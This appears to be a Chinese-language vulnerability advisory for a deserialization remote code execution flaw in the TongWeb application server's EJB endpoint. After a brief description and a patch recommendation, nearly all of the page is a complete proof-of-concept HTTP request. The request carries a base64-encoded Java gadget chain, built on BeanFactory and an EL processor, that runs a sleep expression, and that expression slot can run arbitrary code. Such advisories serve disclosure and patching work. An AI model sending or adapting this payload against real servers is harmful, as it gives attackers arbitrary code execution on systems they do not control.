东方通应用服务器 EJB 反序列化远程代码执行漏洞

日期: 2025-11-13 13:50:02 | 影响软件: 东方通应用服务器 | POC: 已公开

漏洞描述

TongWeb应用服务器是一款标准、安全、高可用并具丰富功能的企业级应用服务器,为企业级应用提供了便捷的开发、随需应变的灵活部署、丰富的运行时监视、高效的易管理等关键支撑。 2025年11月, 东方通官方发布补丁修复了长亭科技安全研究员发现的远程代码执行漏洞。TongWeb在处理EJP协议数据的时候,没有对请求的数据进行校验,导致攻击者可以通过构造恶意的反序列化数据在服务器上执行任意代码。由于该漏洞利用难度较低,建议相关用户及时更新安全补丁进行修复。

PoC代码

POST /ejbserver/ejb HTTP/1.1
Content-Type: application/octet-stream

{{base64decode(VzNFUC8zLjCs7QAFdwEYc3IAE2phdmEudXRpbC5IYXNodGFibGUTuw8lIUrkuAMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAIdwgAAAALAAAAAnNyAC1qYXZheC5zd2luZy5VSURlZmF1bHRzJFRleHRBbmRNbmVtb25pY0hhc2hNYXC98e1SrfvKFAIAAHhyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP4AAAAAAAAx3CAAAABAAAAABc3IAMmNvbS50b25nd2ViLnRvbmdlamIuY2xpZW50LkpORElDb250ZXh0JExhenlCaW5kaW5nAAAAAAAAAAECAAJMAAdjb250ZXh0dAAWTGphdmF4L25hbWluZy9Db250ZXh0O0wABmZhaWxlZHQAHExqYXZhL2xhbmcvUnVudGltZUV4Y2VwdGlvbjt4cgAUamF2YXgubmFtaW5nLkJpbmRpbmd6qzXLtfEvAgIAAUwACGJvdW5kT2JqdAASTGphdmEvbGFuZy9PYmplY3Q7eHIAGmphdmF4Lm5hbWluZy5OYW1lQ2xhc3NQYWlyTgECi/p2aGsCAARaAAVpc1JlbEwACWNsYXNzTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wACGZ1bGxOYW1lcQB+AAtMAARuYW1lcQB+AAt4cAF0AAR0ZXN0cHQABnh4eHh4eHBzcgAwY29tLnRvbmd3ZWIueGJlYW4ubmFtaW5nLmNvbnRleHQuV3JpdGFibGVDb250ZXh0M1KGUeRSmOQCAAdaABZhc3N1bWVEZXJlZmVyZW5jZUJvdW5kWgAPY2FjaGVSZWZlcmVuY2VzWgAZY2hlY2tEZXJlZmVyZW5jZURpZmZlcmVudFoAFHN1cHBvcnRSZWZlcmVuY2VhYmxlTAALYmluZGluZ3NSZWZ0AC1MamF2YS91dGlsL2NvbmN1cnJlbnQvYXRvbWljL0F0b21pY1JlZmVyZW5jZTtMAAhpbmRleFJlZnEAfgAQTAAJd3JpdGVMb2NrdAAhTGphdmEvdXRpbC9jb25jdXJyZW50L2xvY2tzL0xvY2s7eHIAOWNvbS50b25nd2ViLnhiZWFuLm5hbWluZy5jb250ZXh0LkFic3RyYWN0RmVkZXJhdGVkQ29udGV4dIPPKb5mdInUAgACTAARY29udGV4dEZlZGVyYXRpb250ADRMY29tL3Rvbmd3ZWIveGJlYW4vbmFtaW5nL2NvbnRleHQvQ29udGV4dEZlZGVyYXRpb247TAANbWFzdGVyQ29udGV4dHQAO0xjb20vdG9uZ3dlYi94YmVhbi9uYW1pbmcvY29udGV4dC9BYnN0cmFjdEZlZGVyYXRlZENvbnRleHQ7eHIAMGNvbS50b25nd2ViLnhiZWFuLm5hbWluZy5jb250ZXh0LkFic3RyYWN0Q29udGV4dFn0ZncqckxrAgAFWgAKbW9kaWZpYWJsZUwADWNvbnRleHRBY2Nlc3N0ADBMY29tL3Rvbmd3ZWIveGJlYW4vbmFtaW5nL2NvbnRleHQvQ29udGV4dEFjY2VzcztMAAZpbkNhbGx0ABdMamF2YS9sYW5nL1RocmVhZExvY2FsO0wAD25hbWVJbk5hbWVzcGFjZXEAfgALTAAVcGFyc2VkTmFtZUluTmFtZXNwYWNldAATTGphdmF4L25hbWluZy9OYW1lO3hwAHBwcHBwcAAAAABwc3IAK2phdmEudXRpbC5jb25jdXJyZW50LmF0b21pYy5BdG9taWNSZWZlcmVuY2XmV3HUVXhUxgIAAUwABXZhbHVlcQB+AAl4cHNxAH4AAz9AAAAAAAAMdwgAAAAQAAAAAXEAfgAOc3IAHmNvbS50b25nd2ViLm5hbWluZy5SZXNvdXJjZVJlZgAAAAAAAAABAgAAeHIAFmphdmF4Lm5hbWluZy5SZWZlcmVuY2Xoxp6iqOmNCQIABEwABWFkZHJzdAASTGphdmEvdXRpbC9WZWN0b3I7TAAMY2xhc3NGYWN0b3J5cQB+AAtMABRjbGFzc0ZhY3RvcnlMb2NhdGlvbnEAfgALTAAJY2xhc3NOYW1lcQB+AAt4cHNyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAV1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAGmphdmF4Lm5hbWluZy5TdHJpbmdSZWZBZGRyhEv0POER3MkCAAFMAAhjb250ZW50c3EAfgALeHIAFGphdmF4Lm5hbWluZy5SZWZBZGRy66AHmgI4r0oCAAFMAAhhZGRyVHlwZXEAfgALeHB0AAVzY29wZXQAAHNxAH4AJnQABGF1dGhxAH4AKnNxAH4AJnQACXNpbmdsZXRvbnQABHRydWVzcQB+ACZ0AAtmb3JjZVN0cmluZ3QACWZ1Y2s9ZXZhbHNxAH4AJnQABGZ1Y2t0ABJUaHJlYWQuc2xlZXAoODAwMClwcHBwcHh0ACZjb20udG9uZ3dlYi5uYW1pbmcuZmFjdG9yeS5CZWFuRmFjdG9yeXB0ABRqYXZheC5lbC5FTFByb2Nlc3NvcnhwcHB4c3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcQB+AAI/gAAAAAAADHcIAAAAEAAAAAFxAH4ADHB4cQB+ADp4)}}